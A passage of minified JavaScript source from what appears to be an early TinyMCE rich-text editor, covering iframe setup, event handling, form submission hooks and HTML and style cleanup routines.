"mceAddEditor":tinyMCE.addMCEControl(tinyMCE._getElementById(value),value);return;case "mceAddFrameControl":tinyMCE.addMCEControl(tinyMCE._getElementById(value),value['element'],value['document']);return;case "mceRemoveControl":case "mceRemoveEditor":tinyMCE.removeMCEControl(value);return;case "mceResetDesignMode":if(!tinyMCE.isMSIE){for(var n in tinyMCE.instances){if(!tinyMCE.isInstance(tinyMCE.instances[n]))continue;try{tinyMCE.instances[n].getDoc().designMode="on";}catch(e){}}}return;}if(this.selectedInstance){this.selectedInstance.execCommand(command,user_interface,value);}else if(tinyMCE.settings['focus_alert'])alert(tinyMCELang['lang_focus_alert']);};TinyMCE.prototype.eventPatch=function(editor_id){if(typeof(tinyMCE)=="undefined")return true;for(var i=0;i<document.frames.length;i++){try{if(document.frames[i].event){var event=document.frames[i].event;if(!event.target)event.target=event.srcElement;TinyMCE.prototype.handleEvent(event);return;}}catch(ex){}}};TinyMCE.prototype.unloadHandler=function(){tinyMCE.triggerSave(true,true);};TinyMCE.prototype.addEventHandlers=function(editor_id){if(tinyMCE.isMSIE){var doc=document.frames[editor_id].document;tinyMCE.addEvent(doc,"keypress",TinyMCE.prototype.eventPatch);tinyMCE.addEvent(doc,"keyup",TinyMCE.prototype.eventPatch);tinyMCE.addEvent(doc,"keydown",TinyMCE.prototype.eventPatch);tinyMCE.addEvent(doc,"mouseup",TinyMCE.prototype.eventPatch);tinyMCE.addEvent(doc,"click",TinyMCE.prototype.eventPatch);}else{var inst=tinyMCE.instances[editor_id];var doc=inst.getDoc();inst.switchSettings();tinyMCE.addEvent(doc,"keypress",tinyMCE.handleEvent);tinyMCE.addEvent(doc,"keydown",tinyMCE.handleEvent);tinyMCE.addEvent(doc,"keyup",tinyMCE.handleEvent);tinyMCE.addEvent(doc,"click",tinyMCE.handleEvent);tinyMCE.addEvent(doc,"mouseup",tinyMCE.handleEvent);tinyMCE.addEvent(doc,"mousedown",tinyMCE.handleEvent);tinyMCE.addEvent(doc,"focus",tinyMCE.handleEvent);tinyMCE.addEvent(doc,"blur",tinyMCE.handleEvent);eval('try { doc.designMode = "On"; } catch(e) {}');}};TinyMCE.prototype._createIFrame=function(replace_element){var iframe=document.createElement("iframe");var id=replace_element.getAttribute("id");var aw,ah;aw=""+tinyMCE.settings['area_width'];ah=""+tinyMCE.settings['area_height'];if(aw.indexOf('%')==-1){aw=parseInt(aw);aw=aw<0?300:aw;aw=aw+"px";}if(ah.indexOf('%')==-1){ah=parseInt(ah);ah=ah<0?240:ah;ah=ah+"px";}iframe.setAttribute("id",id);iframe.setAttribute("border","0");iframe.setAttribute("frameBorder","0");iframe.setAttribute("marginWidth","0");iframe.setAttribute("marginHeight","0");iframe.setAttribute("leftMargin","0");iframe.setAttribute("topMargin","0");iframe.setAttribute("width",aw);iframe.setAttribute("height",ah);iframe.setAttribute("allowtransparency","true");if(tinyMCE.settings["auto_resize"])iframe.setAttribute("scrolling","no");if(tinyMCE.isMSIE&&!tinyMCE.isOpera)iframe.setAttribute("src",this.settings['default_document']);iframe.style.width=aw;iframe.style.height=ah;if(tinyMCE.isMSIE&&!tinyMCE.isOpera)replace_element.outerHTML=iframe.outerHTML;else replace_element.parentNode.replaceChild(iframe,replace_element);if(tinyMCE.isMSIE)return window.frames[id];else return iframe;};TinyMCE.prototype.setupContent=function(editor_id){var inst=tinyMCE.instances[editor_id];var doc=inst.getDoc();var head=doc.getElementsByTagName('head').item(0);var content=inst.startContent;tinyMCE.operaOpacityCounter=100*tinyMCE.idCounter;inst.switchSettings();if(!tinyMCE.isMSIE&&doc.title!="blank_page"){try{doc.location.href=tinyMCE.baseURL+"/blank.htm";}catch(ex){}window.setTimeout("tinyMCE.setupContent('"+editor_id+"');",1000);return;}if(!head){window.setTimeout("tinyMCE.setupContent('"+editor_id+"');",10);return;}tinyMCE.importCSS(inst.getDoc(),tinyMCE.baseURL+"/themes/"+inst.settings['theme']+"/css/editor_content.css");tinyMCE.importCSS(inst.getDoc(),inst.settings['content_css']);tinyMCE.executeCallback('init_instance_callback','_initInstance',0,inst);if(tinyMCE.getParam("convert_fonts_to_spans"))inst.getDoc().body.setAttribute('id','mceSpanFonts');if(tinyMCE.settings['nowrap'])doc.body.style.whiteSpace="nowrap";doc.body.dir=this.settings['directionality'];doc.editorId=editor_id;if(!tinyMCE.isMSIE)doc.documentElement.editorId=editor_id;var base=doc.createElement("base");base.setAttribute('href',tinyMCE.settings['base_href']);head.appendChild(base);if(tinyMCE.settings['convert_newlines_to_brs']){content=tinyMCE.regexpReplace(content,"\r\n","<br />","gi");content=tinyMCE.regexpReplace(content,"\r","<br />","gi");content=tinyMCE.regexpReplace(content,"\n","<br />","gi");}content=tinyMCE._customCleanup(inst,"insert_to_editor",content);if(tinyMCE.isMSIE){window.setInterval('try{tinyMCE.getCSSClasses(document.frames["'+editor_id+'"].document, "'+editor_id+'");}catch(e){}',500);if(tinyMCE.settings["force_br_newlines"])document.frames[editor_id].document.styleSheets[0].addRule("p","margin: 0px;");var body=document.frames[editor_id].document.body;tinyMCE.addEvent(body,"beforepaste",TinyMCE.prototype.eventPatch);tinyMCE.addEvent(body,"beforecut",TinyMCE.prototype.eventPatch);body.editorId=editor_id;}content=tinyMCE.cleanupHTMLCode(content);if(!tinyMCE.isMSIE){var contentElement=inst.getDoc().createElement("body");var doc=inst.getDoc();contentElement.innerHTML=content;if(tinyMCE.isGecko&&tinyMCE.settings['remove_lt_gt'])content=content.replace(new RegExp('<>','g'),"");if(tinyMCE.settings['cleanup_on_startup'])tinyMCE.setInnerHTML(inst.getBody(),tinyMCE._cleanupHTML(inst,doc,this.settings,contentElement));else{content=tinyMCE.regexpReplace(content,"<strong","<b","gi");content=tinyMCE.regexpReplace(content,"<em(/?)>","<i$1>","gi");content=tinyMCE.regexpReplace(content,"<em ","<i ","gi");content=tinyMCE.regexpReplace(content,"</strong>","</b>","gi");content=tinyMCE.regexpReplace(content,"</em>","</i>","gi");tinyMCE.setInnerHTML(inst.getBody(),content);}inst.convertAllRelativeURLs();}else{if(tinyMCE.settings['cleanup_on_startup']){tinyMCE._setHTML(inst.getDoc(),content);eval('try {tinyMCE.setInnerHTML(inst.getBody(), tinyMCE._cleanupHTML(inst, inst.contentDocument, this.settings, inst.getBody());} catch(e) {}');}else tinyMCE._setHTML(inst.getDoc(),content);}var parentElm=document.getElementById(inst.editorId+'_parent');if(parentElm.lastChild.nodeName.toLowerCase()=="input")inst.formElement=parentElm.lastChild;else inst.formElement=parentElm.nextSibling;tinyMCE.handleVisualAid(inst.getBody(),true,tinyMCE.settings['visual'],inst);tinyMCE.executeCallback('setupcontent_callback','_setupContent',0,editor_id,inst.getBody(),inst.getDoc());if(!tinyMCE.isMSIE)TinyMCE.prototype.addEventHandlers(editor_id);if(tinyMCE.isMSIE)tinyMCE.addEvent(inst.getBody(),"blur",TinyMCE.prototype.eventPatch);tinyMCE.selectedInstance=inst;tinyMCE.selectedElement=inst.contentWindow.document.body;tinyMCE.triggerNodeChange(false,true);tinyMCE._customCleanup(inst,"insert_to_editor_dom",inst.getBody());tinyMCE._customCleanup(inst,"setup_content_dom",inst.getBody());tinyMCE._setEventsEnabled(inst.getBody(),false);tinyMCE.cleanupAnchors(inst.getDoc());if(tinyMCE.getParam("convert_fonts_to_spans"))tinyMCE.convertSpansToFonts(inst.getDoc());inst.startContent=tinyMCE.trim(inst.getBody().innerHTML);inst.undoLevels[inst.undoLevels.length]=inst.startContent;tinyMCE.operaOpacityCounter=-1;};TinyMCE.prototype.cleanupHTMLCode=function(s){s=s.replace(/<p\/>/gi,'<p> </p>');s=s.replace(/<p>\s*<\/p>/gi,'<p> </p>');s=s.replace(/<(h[1-6]|p|div|address|pre|form|table|li|ol|ul|td|b|em|strong|i|strike|u|span|a|ul|ol|li|blockquote)([^\\|>]*?)\/>/gi,'<$1$2></$1>');s=s.replace(new RegExp('\\s+></','gi'),'></');if(tinyMCE.isMSIE)s=s.replace(/<p><hr\/><\/p>/gi,"<hr>");s=s.replace(new RegExp('(href=\"?)(\\s*?#)','gi'),'$1'+tinyMCE.settings['document_base_url']+"#");return s;};TinyMCE.prototype.cancelEvent=function(e){if(tinyMCE.isMSIE){e.returnValue=false;e.cancelBubble=true;}else e.preventDefault();};TinyMCE.prototype.removeTinyMCEFormElements=function(form_obj){for(var i=0;i<form_obj.elements.length;i++){var elementId=form_obj.elements[i].name?form_obj.elements[i].name:form_obj.elements[i].id;if(elementId.indexOf('mce_editor_')==0)form_obj.elements[i].disabled=true;}};TinyMCE.prototype.accessibleEventHandler=function(e){var win=this._win;e=tinyMCE.isMSIE?win.event:e;var elm=tinyMCE.isMSIE?e.srcElement:e.target;if(elm.nodeName=="SELECT"&&!elm.oldonchange){elm.oldonchange=elm.onchange;elm.onchange=null;}if(e.keyCode==13||e.keyCode==32){elm.onchange=elm.oldonchange;elm.onchange();elm.oldonchange=null;tinyMCE.cancelEvent(e);}};TinyMCE.prototype.addSelectAccessibility=function(e,select,win){if(!select._isAccessible){select.onkeydown=tinyMCE.accessibleEventHandler;select._isAccessible=true;select._win=win;}};TinyMCE.prototype.handleEvent=function(e){if(typeof(tinyMCE)=="undefined")return true;switch(e.type){case "blur":if(tinyMCE.selectedInstance)tinyMCE.selectedInstance.execCommand('mceEndTyping');return;case "submit":tinyMCE.removeTinyMCEFormElements(tinyMCE.isMSIE?window.event.srcElement:e.target);tinyMCE.triggerSave();tinyMCE.isNotDirty=true;return;case "reset":var formObj=tinyMCE.isMSIE?window.event.srcElement:e.target;for(var i=0;i<document.forms.length;i++){if(document.forms[i]==formObj)window.setTimeout('tinyMCE.resetForm('+i+');',10);}return;case "keypress":if(e.target.editorId){tinyMCE.selectedInstance=tinyMCE.instances[e.target.editorId];}else{if(e.target.ownerDocument.editorId)tinyMCE.selectedInstance=tinyMCE.instances[e.target.ownerDocument.editorId];}if(tinyMCE.selectedInstance)tinyMCE.selectedInstance.switchSettings();if(tinyMCE.isGecko&&tinyMCE.settings['force_p_newlines']&&e.keyCode==13&&!e.shiftKey){if(tinyMCE.selectedInstance._insertPara(e)){tinyMCE.execCommand("mceAddUndoLevel");tinyMCE.cancelEvent(e);return false;}}if(tinyMCE.isGecko&&tinyMCE.settings['force_p_newlines']&&(e.keyCode==8||e.keyCode==46)&&!e.shiftKey){if(tinyMCE.selectedInstance._handleBackSpace(e.type)){tinyMCE.execCommand("mceAddUndoLevel");e.preventDefault();return false;}}if(tinyMCE.isGecko&&(e.ctrlKey&&!e.altKey)&&tinyMCE.settings['custom_undo_redo']){if(tinyMCE.settings['custom_undo_redo_keyboard_shortcuts']){if(e.charCode==122){tinyMCE.selectedInstance.execCommand("Undo");e.preventDefault();return false;}if(e.charCode==121){tinyMCE.selectedInstance.execCommand("Redo");e.preventDefault();return false;}}if(e.charCode==98){tinyMCE.selectedInstance.execCommand("Bold");e.preventDefault();return false;}if(e.charCode==105){tinyMCE.selectedInstance.execCommand("Italic");e.preventDefault();return false;}if(e.charCode==117){tinyMCE.selectedInstance.execCommand("Underline");e.preventDefault();return false;}}if(tinyMCE.isMSIE&&tinyMCE.settings['force_br_newlines']&&e.keyCode==13){if(e.target.editorId)tinyMCE.selectedInstance=tinyMCE.instances[e.target.editorId];if(tinyMCE.selectedInstance){var sel=tinyMCE.selectedInstance.getDoc().selection;var rng=sel.createRange();if(tinyMCE.getParentElement(rng.parentElement(),"li")!=null)return false;e.returnValue=false;e.cancelBubble=true;rng.pasteHTML("<br />");rng.collapse(false);rng.select();tinyMCE.execCommand("mceAddUndoLevel");tinyMCE.triggerNodeChange(false);return false;}}if(e.keyCode==8||e.keyCode==46){tinyMCE.selectedElement=e.target;tinyMCE.linkElement=tinyMCE.getParentElement(e.target,"a");tinyMCE.imgElement=tinyMCE.getParentElement(e.target,"img");tinyMCE.triggerNodeChange(false);}return false;break;case "keyup":case "keydown":if(e.target.editorId)tinyMCE.selectedInstance=tinyMCE.instances[e.target.editorId];else return;if(tinyMCE.selectedInstance)tinyMCE.selectedInstance.switchSettings();var inst=tinyMCE.selectedInstance;if(tinyMCE.isGecko&&tinyMCE.settings['force_p_newlines']&&(e.keyCode==8||e.keyCode==46)&&!e.shiftKey){if(tinyMCE.selectedInstance._handleBackSpace(e.type)){tinyMCE.execCommand("mceAddUndoLevel");e.preventDefault();return false;}}tinyMCE.selectedElement=null;tinyMCE.selectedNode=null;var elm=tinyMCE.selectedInstance.getFocusElement();tinyMCE.linkElement=tinyMCE.getParentElement(elm,"a");tinyMCE.imgElement=tinyMCE.getParentElement(elm,"img");tinyMCE.selectedElement=elm;if(tinyMCE.isGecko&&e.type=="keyup"&&e.keyCode==9)tinyMCE.handleVisualAid(tinyMCE.selectedInstance.getBody(),true,tinyMCE.settings['visual'],tinyMCE.selectedInstance);if(tinyMCE.isGecko&&tinyMCE.settings['document_base_url']!=""+document.location.href&&e.type=="keyup"&&e.ctrlKey&&e.keyCode==86)tinyMCE.selectedInstance.fixBrokenURLs();if(tinyMCE.isMSIE&&e.type=="keydown"&&e.keyCode==13)tinyMCE.enterKeyElement=tinyMCE.selectedInstance.getFocusElement();if(tinyMCE.isMSIE&&e.type=="keyup"&&e.keyCode==13){var elm=tinyMCE.enterKeyElement;if(elm){var re=new RegExp('^HR|IMG|BR$','g');var dre=new RegExp('^H[1-6]$','g');if(!elm.hasChildNodes()&&!re.test(elm.nodeName)){if(dre.test(elm.nodeName))elm.innerHTML=" ";else elm.innerHTML=" ";}}}var keys=tinyMCE.posKeyCodes;var posKey=false;for(var i=0;i<keys.length;i++){if(keys[i]==e.keyCode){posKey=true;break;}}if(tinyMCE.isMSIE&&tinyMCE.settings['custom_undo_redo']){var keys=new Array(8,46);for(var i=0;i<keys.length;i++){if(keys[i]==e.keyCode){if(e.type=="keyup")tinyMCE.triggerNodeChange(false);}}if(tinyMCE.settings['custom_undo_redo_keyboard_shortcuts']){if(e.keyCode==90&&(e.ctrlKey&&!e.altKey)&&e.type=="keydown"){tinyMCE.selectedInstance.execCommand("Undo");tinyMCE.triggerNodeChange(false);}if(e.keyCode==89&&(e.ctrlKey&&!e.altKey)&&e.type=="keydown"){tinyMCE.selectedInstance.execCommand("Redo");tinyMCE.triggerNodeChange(false);}if((e.keyCode==90||e.keyCode==89)&&(e.ctrlKey&&!e.altKey)){e.returnValue=false;e.cancelBubble=true;return false;}}}if(!posKey&&e.type=="keyup")tinyMCE.execCommand("mceStartTyping");if(e.type=="keyup"&&(posKey||e.ctrlKey))tinyMCE.execCommand("mceEndTyping");if(posKey&&e.type=="keyup")tinyMCE.triggerNodeChange(false);if(tinyMCE.isMSIE&&e.ctrlKey)window.setTimeout('tinyMCE.triggerNodeChange(false);',1);break;case "mousedown":case "mouseup":case "click":case "focus":if(tinyMCE.selectedInstance)tinyMCE.selectedInstance.switchSettings();var targetBody=tinyMCE.getParentElement(e.target,"body");for(var instanceName in tinyMCE.instances){if(!tinyMCE.isInstance(tinyMCE.instances[instanceName]))continue;var inst=tinyMCE.instances[instanceName];inst.autoResetDesignMode();if(inst.getBody()==targetBody){tinyMCE.selectedInstance=inst;tinyMCE.selectedElement=e.target;tinyMCE.linkElement=tinyMCE.getParentElement(tinyMCE.selectedElement,"a");tinyMCE.imgElement=tinyMCE.getParentElement(tinyMCE.selectedElement,"img");break;}}if(tinyMCE.isSafari){tinyMCE.selectedInstance.lastSafariSelection=tinyMCE.selectedInstance.getBookmark();tinyMCE.selectedInstance.lastSafariSelectedElement=tinyMCE.selectedElement;var lnk=tinyMCE.getParentElement(tinyMCE.selectedElement,"a");if(lnk&&e.type=="mousedown"){lnk.setAttribute("mce_real_href",lnk.getAttribute("href"));lnk.setAttribute("href","javascript:void(0);");}if(lnk&&e.type=="click"){window.setTimeout(function(){lnk.setAttribute("href",lnk.getAttribute("mce_real_href"));lnk.removeAttribute("mce_real_href");},10);}}if(e.type!="focus")tinyMCE.selectedNode=null;tinyMCE.triggerNodeChange(false);tinyMCE.execCommand("mceEndTyping");if(e.type=="mouseup")tinyMCE.execCommand("mceAddUndoLevel");if(!tinyMCE.selectedInstance&&e.target.editorId)tinyMCE.selectedInstance=tinyMCE.instances[e.target.editorId];if(tinyMCE.isGecko&&tinyMCE.settings['document_base_url']!=""+document.location.href)window.setTimeout('tinyMCE.getInstanceById("'+inst.editorId+'").fixBrokenURLs();',10);return false;break;}};TinyMCE.prototype.switchClass=function(element,class_name,lock_state){var lockChanged=false;if(typeof(lock_state)!="undefined"&&element!=null){element.classLock=lock_state;lockChanged=true;}if(element!=null&&(lockChanged||!element.classLock)){element.oldClassName=element.className;element.className=class_name;}};TinyMCE.prototype.restoreAndSwitchClass=function(element,class_name){if(element!=null&&!element.classLock){this.restoreClass(element);this.switchClass(element,class_name);}};TinyMCE.prototype.switchClassSticky=function(element_name,class_name,lock_state){var element,lockChanged=false;if(!this.stickyClassesLookup[element_name])this.stickyClassesLookup[element_name]=document.getElementById(element_name);element=this.stickyClassesLookup[element_name];if(typeof(lock_state)!="undefined"&&element!=null){element.classLock=lock_state;lockChanged=true;}if(element!=null&&(lockChanged||!element.classLock)){element.className=class_name;element.oldClassName=class_name;if(tinyMCE.isOpera){if(class_name=="mceButtonDisabled"){var suffix="";if(!element.mceOldSrc)element.mceOldSrc=element.src;if(this.operaOpacityCounter>-1)suffix='?rnd='+this.operaOpacityCounter++;element.src=tinyMCE.baseURL+"/themes/"+tinyMCE.getParam("theme")+"/images/opacity.png"+suffix;element.style.backgroundImage="url('"+element.mceOldSrc+"')";}else{if(element.mceOldSrc){element.src=element.mceOldSrc;element.parentNode.style.backgroundImage="";element.mceOldSrc=null;}}}}};TinyMCE.prototype.restoreClass=function(element){if(element!=null&&element.oldClassName&&!element.classLock){element.className=element.oldClassName;element.oldClassName=null;}};TinyMCE.prototype.setClassLock=function(element,lock_state){if(element!=null)element.classLock=lock_state;};TinyMCE.prototype.addEvent=function(obj,name,handler){if(tinyMCE.isMSIE){obj.attachEvent("on"+name,handler);}else obj.addEventListener(name,handler,false);};TinyMCE.prototype.submitPatch=function(){tinyMCE.removeTinyMCEFormElements(this);tinyMCE.triggerSave();this.mceOldSubmit();tinyMCE.isNotDirty=true;};TinyMCE.prototype.onLoad=function(){for(var c=0;c<tinyMCE.configs.length;c++){tinyMCE.settings=tinyMCE.configs[c];var selector=tinyMCE.getParam("editor_selector");var deselector=tinyMCE.getParam("editor_deselector");var elementRefAr=new Array();if(document.forms&&tinyMCE.settings['add_form_submit_trigger']&&!tinyMCE.submitTriggers){for(var i=0;i<document.forms.length;i++){var form=document.forms[i];tinyMCE.addEvent(form,"submit",TinyMCE.prototype.handleEvent);tinyMCE.addEvent(form,"reset",TinyMCE.prototype.handleEvent);tinyMCE.submitTriggers=true;if(tinyMCE.settings['submit_patch']){try{form.mceOldSubmit=form.submit;form.submit=TinyMCE.prototype.submitPatch;}catch(e){}}}}var mode=tinyMCE.settings['mode'];switch(mode){case "exact":var elements=tinyMCE.getParam('elements','',true,',');for(var i=0;i<elements.length;i++){var element=tinyMCE._getElementById(elements[i]);var trigger=element?element.getAttribute(tinyMCE.settings['textarea_trigger']):"";if(tinyMCE.getAttrib(element,"class").indexOf(deselector)!=-1)continue;if(trigger=="false")continue;if(tinyMCE.settings['ask']&&element){elementRefAr[elementRefAr.length]=element;continue;}if(element)tinyMCE.addMCEControl(element,elements[i]);else if(tinyMCE.settings['debug'])alert("Error: Could not find element by id or name: "+elements[i]);}break;case "specific_textareas":case "textareas":var nodeList=document.getElementsByTagName("textarea");for(var i=0;i<nodeList.length;i++){var elm=nodeList.item(i);var trigger=elm.getAttribute(tinyMCE.settings['textarea_trigger']);if(selector!=''&&tinyMCE.getAttrib(elm,"class").indexOf(selector)==-1)continue;if(tinyMCE.getAttrib(elm,"class").indexOf(deselector)!=-1)continue;if((mode=="specific_textareas"&&trigger=="true")||(mode=="textareas"&&trigger!="false"))elementRefAr[elementRefAr.length]=elm;}break;}for(var i=0;i<elementRefAr.length;i++){var element=elementRefAr[i];var elementId=element.name?element.name:element.id;if(tinyMCE.settings['ask']){if(tinyMCE.isGecko){var settings=tinyMCE.settings;tinyMCE.addEvent(element,"focus",function(e){window.setTimeout(function(){TinyMCE.prototype.confirmAdd(e,settings);},10);});}else{var settings=tinyMCE.settings;tinyMCE.addEvent(element,"focus",function(){TinyMCE.prototype.confirmAdd(null,settings);});}}else tinyMCE.addMCEControl(element,elementId);}if(tinyMCE.settings['auto_focus']){window.setTimeout(function(){var inst=tinyMCE.getInstanceById(tinyMCE.settings['auto_focus']);inst.selectNode(inst.getBody(),true,true);inst.contentWindow.focus();},10);}tinyMCE.executeCallback('oninit','_oninit',0);}};TinyMCE.prototype.removeMCEControl=function(editor_id){var inst=tinyMCE.getInstanceById(editor_id);if(inst){inst.switchSettings();editor_id=inst.editorId;var html=tinyMCE.getContent(editor_id);var tmpInstances=new Array();for(var instanceName in tinyMCE.instances){var instance=tinyMCE.instances[instanceName];if(!tinyMCE.isInstance(instance))continue;if(instanceName!=editor_id)tmpInstances[instanceName]=instance;}tinyMCE.instances=tmpInstances;tinyMCE.selectedElement=null;tinyMCE.selectedInstance=null;var replaceElement=document.getElementById(editor_id+"_parent");var oldTargetElement=inst.oldTargetElement;var targetName=oldTargetElement.nodeName.toLowerCase();if(targetName=="textarea"||targetName=="input"){replaceElement.parentNode.removeChild(replaceElement);oldTargetElement.style.display="inline";oldTargetElement.value=html;}else{oldTargetElement.innerHTML=html;replaceElement.parentNode.insertBefore(oldTargetElement,replaceElement);replaceElement.parentNode.removeChild(replaceElement);}}};TinyMCE.prototype._cleanupElementName=function(element_name,element){var name="";element_name=element_name.toLowerCase();if(element_name=="body")return null;if(tinyMCE.cleanup_verify_html){for(var i=0;i<tinyMCE.cleanup_invalidElements.length;i++){if(tinyMCE.cleanup_invalidElements[i]==element_name)return null;}var validElement=false;var elementAttribs=null;for(var i=0;i<tinyMCE.cleanup_validElements.length&&!elementAttribs;i++){for(var x=0,n=tinyMCE.cleanup_validElements[i][0].length;x<n;x++){var elmMatch=tinyMCE.cleanup_validElements[i][0][x];if(elmMatch.charAt(0)=='+'||elmMatch.charAt(0)=='-')elmMatch=elmMatch.substring(1);if(elmMatch.match(new RegExp('\\*|\\?|\\+','g'))!=null){elmMatch=elmMatch.replace(new RegExp('\\?','g'),'(\\S?)');elmMatch=elmMatch.replace(new RegExp('\\+','g'),'(\\S+)');elmMatch=elmMatch.replace(new RegExp('\\*','g'),'(\\S*)');elmMatch="^"+elmMatch+"$";if(element_name.match(new RegExp(elmMatch,'g'))){elementAttribs=tinyMCE.cleanup_validElements[i];validElement=true;break;}}if(element_name==elmMatch){elementAttribs=tinyMCE.cleanup_validElements[i];validElement=true;element_name=elementAttribs[0][0];break;}}}if(!validElement)return null;}if(element_name.charAt(0)=='+'||element_name.charAt(0)=='-')name=element_name.substring(1);if(!tinyMCE.isMSIE){if(name=="strong"&&!tinyMCE.cleanup_on_save)element_name="b";else if(name=="em"&&!tinyMCE.cleanup_on_save)element_name="i";}var elmData=new Object();elmData.element_name=element_name;elmData.valid_attribs=elementAttribs;return elmData;};TinyMCE.prototype._moveStyle=function(elm,style,attrib){if(tinyMCE.cleanup_inline_styles){var val=tinyMCE.getAttrib(elm,attrib);if(val!=''){val=''+val;switch(attrib){case "background":val="url('"+val+"');";break;case "bordercolor":if(elm.style.borderStyle==''||elm.style.borderStyle=='none')elm.style.borderStyle='solid';break;case "border":case "width":case "height":if(attrib=="border"&&elm.style.borderWidth>0)return;if(val.indexOf('%')==-1)val+='px';break;case "vspace":case "hspace":elm.style.marginTop=val+"px";elm.style.marginBottom=val+"px";elm.removeAttribute(attrib);return;case "align":if(elm.nodeName=="IMG"){if(tinyMCE.isMSIE)elm.style.styleFloat=val;else elm.style.cssFloat=val;}else elm.style.textAlign=val;elm.removeAttribute(attrib);return;}if(val!=''){eval('elm.style.'+style+' = val;');elm.removeAttribute(attrib);}}}else{if(style=='')return;var val=eval('elm.style.'+style)==''?tinyMCE.getAttrib(elm,attrib):eval('elm.style.'+style);val=val==null?'':''+val;switch(attrib){case "background":if(val.indexOf('url')==-1&&val!='')val="url('"+val+"');";if(val!=''){elm.style.backgroundImage=val;elm.removeAttribute(attrib);}return;case "border":case "width":case "height":val=val.replace('px','');break;case "align":if(tinyMCE.getAttrib(elm,'align')==''){if(elm.nodeName=="IMG"){if(tinyMCE.isMSIE&&elm.style.styleFloat!=''){val=elm.style.styleFloat;style='styleFloat';}else if(tinyMCE.isGecko&&elm.style.cssFloat!=''){val=elm.style.cssFloat;style='cssFloat';}}}break;}if(val!=''){elm.removeAttribute(attrib);elm.setAttribute(attrib,val);eval('elm.style.'+style+' = "";');}}};TinyMCE.prototype._cleanupAttribute=function(valid_attributes,element_name,attribute_node,element_node){var attribName=attribute_node.nodeName.toLowerCase();var attribValue=attribute_node.nodeValue;var attribMustBeValue=null;var verified=false;if(attribName.indexOf('moz_')!=-1)return null;if(!tinyMCE.isMSIE&&(attribName=="mce_real_href"||attribName=="mce_real_src")){if(!tinyMCE.cleanup_on_save){var attrib=new Object();attrib.name=attribName;attrib.value=attribValue;return attrib;}else return null;}if(tinyMCE.cleanup_verify_html&&!verified){for(var i=1;i<valid_attributes.length;i++){var attribMatch=valid_attributes[i][0];var re=null;if(attribMatch.match(new RegExp('\\*|\\?|\\+','g'))!=null){attribMatch=attribMatch.replace(new RegExp('\\?','g'),'(\\S?)');attribMatch=attribMatch.replace(new RegExp('\\+','g'),'(\\S+)');attribMatch=attribMatch.replace(new RegExp('\\*','g'),'(\\S*)');attribMatch="^"+attribMatch+"$";re=new RegExp(attribMatch,'g');}if((re&&attribName.match(re)!=null)||attribName==attribMatch){verified=true;attribMustBeValue=valid_attributes[i][3];break;}}if(!verified)return false;}else verified=true;switch(attribName){case "size":if(tinyMCE.isMSIE5&&element_name=="font")attribValue=element_node.size;break;case "width":case "height":case "border":if(tinyMCE.isMSIE5)attribValue=eval("element_node."+attribName);break;case "shape":attribValue=attribValue.toLowerCase();break;case "cellspacing":if(tinyMCE.isMSIE5)attribValue=element_node.cellSpacing;break;case "cellpadding":if(tinyMCE.isMSIE5)attribValue=element_node.cellPadding;break;case "color":if(tinyMCE.isMSIE5&&element_name=="font")attribValue=element_node.color;break;case "class":if(tinyMCE.cleanup_on_save&&attribValue.indexOf('mceItemAnchor')!=-1)attribValue=attribValue.replace(/mceItem[a-z0-9]+/gi,'');if(element_name=="table"||element_name=="td"){if(tinyMCE.cleanup_visual_table_class!="")attribValue=tinyMCE.getVisualAidClass(attribValue,!tinyMCE.cleanup_on_save);}if(!tinyMCE._verifyClass(element_node)||attribValue=="")return null;break;case "onfocus":case "onblur":case "onclick":case "ondblclick":case "onmousedown":case "onmouseup":case "onmouseover":case "onmousemove":case "onmouseout":case "onkeypress":case "onkeydown":case "onkeydown":case "onkeyup":attribValue=tinyMCE.cleanupEventStr(""+attribValue);if(attribValue.indexOf('return false;')==0)attribValue=attribValue.substring(14);break;case "style":attribValue=tinyMCE.serializeStyle(tinyMCE.parseStyle(tinyMCE.getAttrib(element_node,"style")));break;case "href":case "src":if(tinyMCE.isGecko18&&attribName=="src")attribValue=element_node.src;if(!tinyMCE.isMSIE&&attribName=="href"&&element_node.getAttribute("mce_real_href"))attribValue=element_node.getAttribute("mce_real_href");if(!tinyMCE.isMSIE&&attribName=="src"&&element_node.getAttribute("mce_real_src"))attribValue=element_node.getAttribute("mce_real_src");if(tinyMCE.isGecko&&!tinyMCE.getParam('relative_urls'))attribValue=tinyMCE.convertRelativeToAbsoluteURL(tinyMCE.settings['base_href'],attribValue);attribValue=eval(tinyMCE.cleanup_urlconverter_callback+"(attribValue, element_node, tinyMCE.cleanup_on_save);");break;case "colspan":case "rowspan":if(attribValue=="1")return null;break;case "_moz-userdefined":case "editorid":case "mce_real_href":case "mce_real_src":return null;}if(attribMustBeValue!=null){var isCorrect=false;for(var i=0;i<attribMustBeValue.length;i++){if(attribValue==attribMustBeValue[i]){isCorrect=true;break;}}if(!isCorrect)return null;}var attrib=new Object();attrib.name=attribName;attrib.value=attribValue;return attrib;};TinyMCE.prototype.clearArray=function(ar){for(var key in ar)ar[key]=null;};TinyMCE.prototype.isInstance=function(inst){return inst!=null&&typeof(inst)=="object"&&inst.isTinyMCEControl;};TinyMCE.prototype.parseStyle=function(str){var ar=new Array();if(str==null)return ar;var st=str.split(';');tinyMCE.clearArray(ar);for(var i=0;i<st.length;i++){if(st[i]=='')continue;var re=new RegExp('^\\s*([^:]*):\\s*(.*)\\s*$');var pa=st[i].replace(re,'$1||$2').split('||');if(pa.length==2)ar[pa[0].toLowerCase()]=pa[1];}return ar;};TinyMCE.prototype.compressStyle=function(ar,pr,sf,res){var box=new Array();box[0]=ar[pr+'-top'+sf];box[1]=ar[pr+'-left'+sf];box[2]=ar[pr+'-right'+sf];box[3]=ar[pr+'-bottom'+sf];for(var i=0;i<box.length;i++){if(box[i]==null)return;for(var a=0;a<box.length;a++){if(box[a]!=box[i])return;}}ar[res]=box[0];ar[pr+'-top'+sf]=null;ar[pr+'-left'+sf]=null;ar[pr+'-right'+sf]=null;ar[pr+'-bottom'+sf]=null;};TinyMCE.prototype.serializeStyle=function(ar){var str="";tinyMCE.compressStyle(ar,"border","","border");tinyMCE.compressStyle(ar,"border","-width","border-width");tinyMCE.compressStyle(ar,"border","-color","border-color");for(var key in ar){var val=ar[key];if(typeof(val)=='function')continue;if(val!=null&&val!=''){val=''+val;val=val.replace(new RegExp("url\\(\\'?([^\\']*)\\'?\\)",'gi'),"url('$1')");if(tinyMCE.getParam("force_hex_style_colors"))val=tinyMCE.convertRGBToHex(val);if(val!="url('')")str+=key.toLowerCase()+": "+val+"; ";}}if(new RegExp('; 